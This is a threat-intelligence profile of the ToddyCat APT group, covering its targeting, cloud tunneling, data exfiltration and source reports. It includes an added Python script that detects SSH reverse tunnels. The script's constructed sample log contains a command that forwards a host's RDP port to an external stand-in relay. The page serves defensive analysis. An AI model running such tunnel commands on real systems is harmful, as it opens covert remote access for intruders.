Toddycat

Threat Actor updated 5 days ago (2024-09-03T11:18:03.684Z)
ToddyCat is a threat actor that primarily targets government organizations in the Asia-Pacific region, using a range of methods to infiltrate systems and collect sensitive data. Reporting on the group (also tracked as ToddyCat APT) describes tunneling through legitimate cloud providers to reach remote infrastructure: an application running on a compromised host with access to the local network connects outward to the cloud service through a legitimate agent, which then redirects traffic or executes specific commands on the actor's behalf. In the reported intrusions, the ToddyCat Ninja malware was deployed approximately 10 minutes after initial infection and, together with other tools, was used to collect and exfiltrate files of interest to the group. Earlier reports found ToddyCat exploiting vulnerabilities in victim infrastructure, making it a significant threat to the organizations it targets. ToddyCat has also been discussed alongside other threat groups, including the China-linked Evasive Panda group, which has targeted Tibetan nationals in India and the United States; ToddyCat itself has been reported to target organizations in Vietnam and Taiwan, stealing data on an industrial scale. Continuous reporting and monitoring of ToddyCat's activities remain essential to understanding its tradecraft and mitigating the threat.
Description last updated: 2024-09-03T11:17:07.201Z
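The tunneling described above is usually visible on the compromised host as an ordinary, signed client binary started with unusual arguments. The following is an added detection example written for this page; it is not code from the page, from Kaspersky, or from the actor. It assumes the "legitimate agent" is an OpenSSH client started with a remote port forward (-R), that process-creation telemetry is available as "timestamp host user command line" records, and that the estate uses the hypothetical internal DNS suffix .corp.example. The log lines are constructed and contain no real indicators.

```python
"""Flag process-creation events that establish an SSH reverse tunnel.

Added example, not part of the original page. The records below are
constructed, and the indicator choice (ssh started with -R, anchored on
a host outside the estate) is an assumption about what tunneling through
a legitimate agent looks like, not a published ToddyCat signature.
"""
import ipaddress
import re
from dataclasses import dataclass

# Hypothetical internal naming convention; adjust to the environment.
INTERNAL_SUFFIXES = (".corp.example",)

# Constructed process-creation records: "<timestamp> <host> <user> <command line>".
SAMPLE_LOG = """\
2024-08-30T09:12:01Z ws-017 jsmith "C:\\Windows\\System32\\OpenSSH\\ssh.exe" -N -R 2222:127.0.0.1:3389 ops@relay.example.net
2024-08-30T09:12:44Z ws-017 jsmith "C:\\Program Files\\Git\\usr\\bin\\ssh.exe" git@github.com
2024-08-30T09:13:10Z srv-db1 svc_backup ssh -L 5432:10.0.0.12:5432 backup@10.0.0.5
2024-08-30T09:20:03Z srv-db1 svc_backup ssh -fNR 8022:localhost:22 svc@jump.corp.example
"""

# "-R spec" or a combined flag group ending in R, e.g. "-fNR spec".
REVERSE_FLAG = re.compile(r"(?:^|\s)-[A-Za-z]*R\s*(\S+)")
# The ssh destination, assumed to be written as user@host.
DESTINATION = re.compile(r"\S+@([A-Za-z0-9.\-]+)")


@dataclass
class Alert:
    ts: str
    host: str
    user: str
    forward_spec: str  # the -R argument, e.g. 2222:127.0.0.1:3389
    remote: str        # host the tunnel is anchored on
    severity: str      # "high" when the anchor is outside the estate


def parse_event(line):
    """Split a record into (ts, host, user, cmdline); None if malformed."""
    parts = line.split(maxsplit=3)
    return parts if len(parts) == 4 else None


def is_internal(endpoint):
    """Private IP, localhost, or a name under an internal suffix."""
    try:
        return ipaddress.ip_address(endpoint).is_private
    except ValueError:
        return endpoint == "localhost" or endpoint.endswith(INTERNAL_SUFFIXES)


def find_reverse_tunnels(log_text):
    """Return one Alert per record whose command line opens a remote forward."""
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_event(line)
        if parsed is None:
            continue
        ts, host, user, cmd = parsed
        m = REVERSE_FLAG.search(cmd)
        if not m:
            continue  # plain sessions and -L/-D forwards are not reverse tunnels
        dest = DESTINATION.search(cmd)
        remote = dest.group(1) if dest else "unknown"
        # An unknown destination is treated as external: the safe default.
        severity = "medium" if remote != "unknown" and is_internal(remote) else "high"
        alerts.append(Alert(ts, host, user, m.group(1), remote, severity))
    return alerts


if __name__ == "__main__":
    for a in find_reverse_tunnels(SAMPLE_LOG):
        print(f"{a.severity:6} {a.ts} {a.host} {a.user}: -R {a.forward_spec} via {a.remote}")
```

Run against the constructed records, the first line (a reverse forward of the local RDP port to an external relay) is reported as high severity, the Git ssh session and the local forward on srv-db1 are ignored, and the reverse forward to an internal jump host is reported at medium severity. In production the same logic belongs in the SIEM, and the internal suffix and private-range checks should reflect the real estate rather than the placeholders used here.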
Aliases We are not currently tracking any aliases
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Apt
Malware
Espionage
Exploit
Source Document References
Information about the Toddycat Threat Actor was read from the documents listed below (display limited to 20 results).
Source | Created | Title
Securelist | 4 days ago | Most interesting IR cases in 2023: insider threats and more
Securelist | 5 days ago | Malware report for Q2 2024 — a quarterly review
Securelist | 25 days ago | Kaspersky report on APT trends in Q2 2024
Securelist | a month ago | LianSpy: Android spyware leveraging Yandex Disk as C2
DARKReading | 3 months ago | Pakistani 'Transparent Tribe' APT Aims for Cross-Platform Impact
Securelist | 4 months ago | QakBot attacks with Windows zero-day (CVE-2024-30051)
Securelist | 4 months ago | 2023 Kaspersky Incident Response report
DARKReading | 5 months ago | ToddyCat APT Is Stealing Data on 'Industrial Scale'
Securelist | 5 months ago | ToddyCat's traffic tunneling and data extraction tools
CERT-EU | a year ago | 'Stayin' Alive' cyber espionage campaign targets telecoms, governments in Asia
CERT-EU | a year ago | APT trends report Q2 2023 – GIXtools
CERT-EU | a year ago | Cyber Security Week in Review: October 13, 2023
Securelist | a year ago | ToddyCat: Keep calm and check logs
CERT-EU | a year ago | Researchers Uncover Ongoing Attacks Targeting Asian Governments and Telecom Giants
CERT-EU | a year ago | Water cybersecurity regulations withdrawn
CERT-EU | a year ago | Chinese 'Stayin' Alive' Attacks Dance Onto Targets With Dumb Malware
InfoSecurity-magazine | 10 months ago | Signature Techniques of Asian APT Groups Revealed
CERT-EU | 10 months ago | Les dernières cyberattaques (24 octobre 2023) [The latest cyberattacks (24 October 2023)]
InfoSecurity-magazine | 10 months ago | QuasarRAT Deploys Advanced DLL Side-Loading Technique
Securityaffairs | a year ago | Security Affairs newsletter Round 442 by Pierluigi Paganini